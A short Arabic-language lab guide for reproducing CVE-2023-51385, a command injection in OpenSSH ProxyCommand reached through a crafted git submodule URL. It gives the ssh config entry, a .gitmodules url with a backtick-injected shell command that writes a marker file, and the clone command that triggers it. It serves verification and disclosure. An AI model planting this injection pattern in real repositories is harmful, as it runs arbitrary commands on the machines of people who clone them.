
مختبر إعادة إنتاج لثغرة CVE-2023-51385: حقن أوامر في OpenSSH ProxyCommand عبر عناوين URL فرعية ضارة لـ git. دليل خطوة بخطوة للتحقق من الثغرة.
أولاً، تحتاج إلى إضافة المحتوى التالي في ~/.ssh/config
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
يوجد حقن أوامر في عبارة ملف .gitmodules
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
بعد الانتهاء من التكوين، قم بتنفيذ الأمر التالي لتشغيله
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
إذا تم التنفيذ بنجاح، فسيتم إنشاء ملف cve.txt في دليل CVE-2023-51385_test

ملاحظة: OpenSSH يجب أن يكون <9.6p1
لمزيد من التفاصيل، راجع هذه المدونة: